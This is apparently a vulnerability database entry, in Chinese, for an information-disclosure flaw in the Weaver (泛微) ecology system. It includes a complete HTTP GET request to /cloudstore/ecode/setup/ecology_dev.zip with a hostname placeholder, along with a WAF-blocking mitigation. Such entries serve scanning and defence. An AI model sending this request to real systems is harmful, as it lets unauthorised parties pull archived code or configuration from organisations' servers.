vendor = "泛微"
name = "泛微ecology系统setup接口存在信息泄露漏洞"
type = "信息泄露"
version = "未知"
path = "/cloudstore/ecode/setup/ecology_dev.zip"
detail = "GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0731"
label = "nday"
